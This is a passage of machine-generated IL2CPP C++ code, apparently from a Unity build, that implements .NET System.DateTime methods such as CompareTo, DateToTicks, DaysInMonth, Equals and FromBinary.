DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___value0, const RuntimeMethod* method) { int64_t V_0 = 0; int64_t V_1 = 0; { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___value0), /*hidden argument*/NULL); V_0 = L_0; int64_t L_1 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); V_1 = L_1; int64_t L_2 = V_1; int64_t L_3 = V_0; if ((((int64_t)L_2) <= ((int64_t)L_3))) { goto IL_0015; } } { return 1; } IL_0015: { int64_t L_4 = V_1; int64_t L_5 = V_0; if ((((int64_t)L_4) >= ((int64_t)L_5))) { goto IL_001b; } } { return (-1); } IL_001b: { return 0; } } extern "C" int32_t DateTime_CompareTo_mB538B6524ED249F1A5ED43E00D61F7D9EB3DAD6E_AdjustorThunk (RuntimeObject * __this, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_CompareTo_mB538B6524ED249F1A5ED43E00D61F7D9EB3DAD6E(_thisAdjusted, ___value0, method); } // System.Int64 System.DateTime::DateToTicks(System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64 (int32_t ___year0, int32_t ___month1, int32_t ___day2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64_MetadataUsageId); s_Il2CppMethodInitialized = true; } Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* V_0 = NULL; int32_t V_1 = 0; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* G_B7_0 = NULL; { int32_t L_0 = ___year0; if ((((int32_t)L_0) < ((int32_t)1))) { goto IL_006c; } } { int32_t L_1 = ___year0; if ((((int32_t)L_1) > ((int32_t)((int32_t)9999)))) { goto IL_006c; } } { int32_t L_2 = ___month1; if ((((int32_t)L_2) < ((int32_t)1))) { goto IL_006c; } } { int32_t L_3 = ___month1; if ((((int32_t)L_3) > ((int32_t)((int32_t)12)))) { goto IL_006c; } } { int32_t L_4 = ___year0; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); bool L_5 = DateTime_IsLeapYear_m973908BB0519EEB99F34E6FCE5774ABF72E8ACF7(L_4, /*hidden argument*/NULL); if (L_5) { goto IL_0024; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_6 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_DaysToMonth365_29(); G_B7_0 = L_6; goto IL_0029; } IL_0024: { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_7 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_DaysToMonth366_30(); G_B7_0 = L_7; } IL_0029: { V_0 = G_B7_0; int32_t L_8 = ___day2; if ((((int32_t)L_8) < ((int32_t)1))) { goto IL_006c; } } { int32_t L_9 = ___day2; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_10 = V_0; int32_t L_11 = ___month1; int32_t L_12 = L_11; int32_t L_13 = (L_10)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_12)); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_14 = V_0; int32_t L_15 = ___month1; int32_t L_16 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_15, (int32_t)1)); int32_t L_17 = (L_14)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_16)); if ((((int32_t)L_9) > ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_13, (int32_t)L_17))))) { goto IL_006c; } } { int32_t L_18 = ___year0; V_1 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_18, (int32_t)1)); int32_t L_19 = V_1; int32_t L_20 = V_1; int32_t L_21 = V_1; int32_t L_22 = V_1; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_23 = V_0; int32_t L_24 = ___month1; int32_t L_25 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_24, (int32_t)1)); int32_t L_26 = (L_23)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_25)); int32_t L_27 = ___day2; return ((int64_t)il2cpp_codegen_multiply((int64_t)(((int64_t)((int64_t)((int32_t)il2cpp_codegen_subtract((int32_t)((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)L_19, (int32_t)((int32_t)365))), (int32_t)((int32_t)((int32_t)L_20/(int32_t)4)))), (int32_t)((int32_t)((int32_t)L_21/(int32_t)((int32_t)100))))), (int32_t)((int32_t)((int32_t)L_22/(int32_t)((int32_t)400))))), (int32_t)L_26)), (int32_t)L_27)), (int32_t)1))))), (int64_t)((int64_t)864000000000LL))); } IL_006c: { String_t* L_28 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6AA37D3F95B049989169366DE359545DDC19DDC5, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_29 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_29, (String_t*)NULL, L_28, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_29, NULL, DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64_RuntimeMethod_var); } } // System.Int64 System.DateTime::TimeToTicks(System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_TimeToTicks_m38671AD5E9A1A1DE63AF5BAC980B0A0E8E67A5DB (int32_t ___hour0, int32_t ___minute1, int32_t ___second2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_TimeToTicks_m38671AD5E9A1A1DE63AF5BAC980B0A0E8E67A5DB_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___hour0; if ((((int32_t)L_0) < ((int32_t)0))) { goto IL_0024; } } { int32_t L_1 = ___hour0; if ((((int32_t)L_1) >= ((int32_t)((int32_t)24)))) { goto IL_0024; } } { int32_t L_2 = ___minute1; if ((((int32_t)L_2) < ((int32_t)0))) { goto IL_0024; } } { int32_t L_3 = ___minute1; if ((((int32_t)L_3) >= ((int32_t)((int32_t)60)))) { goto IL_0024; } } { int32_t L_4 = ___second2; if ((((int32_t)L_4) < ((int32_t)0))) { goto IL_0024; } } { int32_t L_5 = ___second2; if ((((int32_t)L_5) >= ((int32_t)((int32_t)60)))) { goto IL_0024; } } { int32_t L_6 = ___hour0; int32_t L_7 = ___minute1; int32_t L_8 = ___second2; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); int64_t L_9 = TimeSpan_TimeToTicks_m30D961C24084E95EA9FE0565B87FCFFE24DD3632(L_6, L_7, L_8, /*hidden argument*/NULL); return L_9; } IL_0024: { String_t* L_10 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralCA4CB5523B49D5F62897296F6FCD5ABE68B27A24, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_11 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_11, (String_t*)NULL, L_10, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_11, NULL, DateTime_TimeToTicks_m38671AD5E9A1A1DE63AF5BAC980B0A0E8E67A5DB_RuntimeMethod_var); } } // System.Int32 System.DateTime::DaysInMonth(System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_DaysInMonth_mE979D12858E0D6CC14576D283B5AB66AA53B9F90 (int32_t ___year0, int32_t ___month1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_DaysInMonth_mE979D12858E0D6CC14576D283B5AB66AA53B9F90_MetadataUsageId); s_Il2CppMethodInitialized = true; } Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* V_0 = NULL; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* G_B6_0 = NULL; { int32_t L_0 = ___month1; if ((((int32_t)L_0) < ((int32_t)1))) { goto IL_0009; } } { int32_t L_1 = ___month1; if ((((int32_t)L_1) <= ((int32_t)((int32_t)12)))) { goto IL_001e; } } IL_0009: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral38C1D791DA28CCACA40DF5E093EAB4D67B08C70D, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_3 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_3, _stringLiteral021710FA7866431C1DACAA6CD31EEEB47DCE64B6, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, DateTime_DaysInMonth_mE979D12858E0D6CC14576D283B5AB66AA53B9F90_RuntimeMethod_var); } IL_001e: { int32_t L_4 = ___year0; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); bool L_5 = DateTime_IsLeapYear_m973908BB0519EEB99F34E6FCE5774ABF72E8ACF7(L_4, /*hidden argument*/NULL); if (L_5) { goto IL_002d; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_6 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_DaysToMonth365_29(); G_B6_0 = L_6; goto IL_0032; } IL_002d: { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_7 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_DaysToMonth366_30(); G_B6_0 = L_7; } IL_0032: { V_0 = G_B6_0; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_8 = V_0; int32_t L_9 = ___month1; int32_t L_10 = L_9; int32_t L_11 = (L_8)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_10)); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_12 = V_0; int32_t L_13 = ___month1; int32_t L_14 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_13, (int32_t)1)); int32_t L_15 = (L_12)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_14)); return ((int32_t)il2cpp_codegen_subtract((int32_t)L_11, (int32_t)L_15)); } } // System.Boolean System.DateTime::Equals(System.Object) extern "C" IL2CPP_METHOD_ATTR bool DateTime_Equals_m85006DF1EA5B2B7EAB4BEFA643B5683B0BDBE4AB (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject * ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_Equals_m85006DF1EA5B2B7EAB4BEFA643B5683B0BDBE4AB_MetadataUsageId); s_Il2CppMethodInitialized = true; } DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 V_0; memset(&V_0, 0, sizeof(V_0)); { RuntimeObject * L_0 = ___value0; if (!((RuntimeObject *)IsInstSealed((RuntimeObject*)L_0, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))) { goto IL_001f; } } { int64_t L_1 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); RuntimeObject * L_2 = ___value0; V_0 = ((*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)UnBox(L_2, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var)))); int64_t L_3 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&V_0), /*hidden argument*/NULL); return (bool)((((int64_t)L_1) == ((int64_t)L_3))? 1 : 0); } IL_001f: { return (bool)0; } } extern "C" bool DateTime_Equals_m85006DF1EA5B2B7EAB4BEFA643B5683B0BDBE4AB_AdjustorThunk (RuntimeObject * __this, RuntimeObject * ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_Equals_m85006DF1EA5B2B7EAB4BEFA643B5683B0BDBE4AB(_thisAdjusted, ___value0, method); } // System.Boolean System.DateTime::Equals(System.DateTime) extern "C" IL2CPP_METHOD_ATTR bool DateTime_Equals_m5D0978D469FA7B13308608D7DA97E1AF6265AD42 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___value0, const RuntimeMethod* method) { { int64_t L_0 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); int64_t L_1 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___value0), /*hidden argument*/NULL); return (bool)((((int64_t)L_0) == ((int64_t)L_1))? 1 : 0); } } extern "C" bool DateTime_Equals_m5D0978D469FA7B13308608D7DA97E1AF6265AD42_AdjustorThunk (RuntimeObject * __this, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___value0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_Equals_m5D0978D469FA7B13308608D7DA97E1AF6265AD42(_thisAdjusted, ___value0, method); } // System.DateTime System.DateTime::FromBinary(System.Int64) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_FromBinary_m5A34F3CF87443A48B220F77B685C35B8A534E973 (int64_t ___dateData0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_FromBinary_m5A34F3CF87443A48B220F77B685C35B8A534E973_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; bool V_1 = false; int64_t V_2 = 0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 V_3; memset(&V_3, 0, sizeof(V_3)); bool V_4 = false; { int64_t L_0 = ___dateData0; if (!((int64_t)((int64_t)L_0&(int64_t)((int64_t)std::numeric_limits<int64_t>::min())))) { goto IL_00d8; } } { int64_t L_1 = ___dateData0; V_0 = ((int64_t)((int64_t)L_1&(int64_t)((int64_t)4611686018427387903LL))); int64_t L_2 = V_0; if ((((int64_t)L_2) <= ((int64_t)((int64_t)4611685154427387904LL)))) { goto IL_0034; } } { int64_t L_3 = V_0; V_0 = ((int64_t)il2cpp_codegen_subtract((int64_t)L_3, (int64_t)((int64_t)4611686018427387904LL))); } IL_0034: { V_1 = (bool)0; int64_t L_4 = V_0; if ((((int64_t)L_4) >= ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_0051; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_5 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_MinValue_31(); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_6 = TimeZoneInfo_GetLocalUtcOffset_m1C5E0CC7CA725508F5180BDBF2D03C3E8DF0FBFC(L_5, 2, /*hidden argument*/NULL); V_3 = L_6; int64_t L_7 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_3), /*hidden argument*/NULL); V_2 = L_7; goto IL_0094; } IL_0051: { int64_t L_8 = V_0; if ((((int64_t)L_8) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_0073; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_9 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_MaxValue_32(); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_10 = TimeZoneInfo_GetLocalUtcOffset_m1C5E0CC7CA725508F5180BDBF2D03C3E8DF0FBFC(L_9, 2, /*hidden argument*/NULL); V_3 = L_10; int64_t L_11 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_3), /*hidden argument*/NULL); V_2 = L_11; goto IL_0094; } IL_0073: { int64_t L_12 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_13; memset(&L_13, 0, sizeof(L_13)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_13), L_12, 1, /*hidden argument*/NULL); V_4 = (bool)0; TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * L_14 = TimeZoneInfo_get_Local_mD208D43B3366D6E489CA49A7F21164373CEC24FD(/*hidden argument*/NULL); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_15 = TimeZoneInfo_GetUtcOffsetFromUtc_mAA79026F581A893DD65B95D5660E146520B471FA(L_13, L_14, (bool*)(&V_4), (bool*)(&V_1), /*hidden argument*/NULL); V_3 = L_15; int64_t L_16 = TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_3), /*hidden argument*/NULL); V_2 = L_16; } IL_0094: { int64_t L_17 = V_0; int64_t L_18 = V_2; V_0 = ((int64_t)il2cpp_codegen_add((int64_t)L_17, (int64_t)L_18)); int64_t L_19 = V_0; if ((((int64_t)L_19) >= ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_00a9; } } { int64_t L_20 = V_0; V_0 = ((int64_t)il2cpp_codegen_add((int64_t)L_20, (int64_t)((int64_t)864000000000LL))); } IL_00a9: { int64_t L_21 = V_0; if ((((int64_t)L_21) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_00ba; } } { int64_t L_22 = V_0; if ((((int64_t)L_22) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_00cf; } } IL_00ba: { String_t* L_23 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6C5D741642268E1DBC189EC8C48B5474FAFA45E1, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_24 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m26DC3463C6F3C98BF33EA39598DD2B32F0249CA8(L_24, L_23, _stringLiteral8D475FBD52CC44C4B3646CB6D42B92B682940C75, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_24, NULL, DateTime_FromBinary_m5A34F3CF87443A48B220F77B685C35B8A534E973_RuntimeMethod_var); } IL_00cf: { int64_t L_25 = V_0; bool L_26 = V_1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_27; memset(&L_27, 0, sizeof(L_27)); DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84((&L_27), L_25, 2, L_26, /*hidden argument*/NULL); return L_27; } IL_00d8: { int64_t L_28 = ___dateData0; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_29 = DateTime_FromBinaryRaw_m62E01B6FBD437260699D149A18C00CA49B793A5F(L_28, /*hidden argument*/NULL); return L_29; } } // System.DateTime System.DateTime::FromBinaryRaw(System.Int64) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_FromBinaryRaw_m62E01B6FBD437260699D149A18C00CA49B793A5F (int64_t ___dateData0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_FromBinaryRaw_m62E01B6FBD437260699D149A18C00CA49B793A5F_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; { int64_t L_0 = ___dateData0; V_0 = ((int64_t)((int64_t)L_0&(int64_t)((int64_t)4611686018427387903LL))); int64_t L_1 = V_0; if ((((int64_t)L_1) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_001d; } } { int64_t L_2 = V_0; if ((((int64_t)L_2) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_0032; } } IL_001d: { String_t* L_3 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6C5D741642268E1DBC189EC8C48B5474FAFA45E1, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_4 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m26DC3463C6F3C98BF33EA39598DD2B32F0249CA8(L_4, L_3, _stringLiteral8D475FBD52CC44C4B3646CB6D42B92B682940C75, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_FromBinaryRaw_m62E01B6FBD437260699D149A18C00CA49B793A5F_RuntimeMethod_var); } IL_0032: { int64_t L_5 = ___dateData0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_6; memset(&L_6, 0, sizeof(L_6)); DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E((&L_6), L_5, /*hidden argument*/NULL); return L_6; } } // System.Void System.DateTime::System.Runtime.Serialization.ISerializable.GetObjectData(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext) extern "C" IL2CPP_METHOD_ATTR void DateTime_System_Runtime_Serialization_ISerializable_GetObjectData_m6DDB58B228D00F832D1670A52C6217973595CFA6 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * ___info0, StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034 ___context1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_Runtime_Serialization_ISerializable_GetObjectData_m6DDB58B228D00F832D1670A52C6217973595CFA6_MetadataUsageId); s_Il2CppMethodInitialized = true; } { SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * L_0 = ___info0; if (L_0) { goto IL_000e; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_1 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_1, _stringLiteral59BD0A3FF43B32849B319E645D4798D8A5D1E889, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DateTime_System_Runtime_Serialization_ISerializable_GetObjectData_m6DDB58B228D00F832D1670A52C6217973595CFA6_RuntimeMethod_var); } IL_000e: { SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * L_2 = ___info0; int64_t L_3 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); SerializationInfo_AddValue_mCCC2918D05840247B2A72A834940BD36AD7F5DE4(L_2, _stringLiteral5F82205BEDF93F9FC5534E27F6D5798CA8E49C9A, L_3, /*hidden argument*/NULL); SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * L_4 = ___info0; uint64_t L_5 = __this->get_dateData_44(); SerializationInfo_AddValue_m9861690C28AB414534D1A7F599E050DBA7A99303(L_4, _stringLiteral8D475FBD52CC44C4B3646CB6D42B92B682940C75, L_5, /*hidden argument*/NULL); return; } } extern "C" void DateTime_System_Runtime_Serialization_ISerializable_GetObjectData_m6DDB58B228D00F832D1670A52C6217973595CFA6_AdjustorThunk (RuntimeObject * __this, SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * ___info0, StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034 ___context1, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); DateTime_System_Runtime_Serialization_ISerializable_GetObjectData_m6DDB58B228D00F832D1670A52C6217973595CFA6(_thisAdjusted, ___info0, ___context1, method); } // System.DateTime System.DateTime::SpecifyKind(System.DateTime,System.DateTimeKind) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_SpecifyKind_m2E9B2B28CB3255EA842EBCBA42AF0565144D2316 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___value0, int32_t ___kind1, const 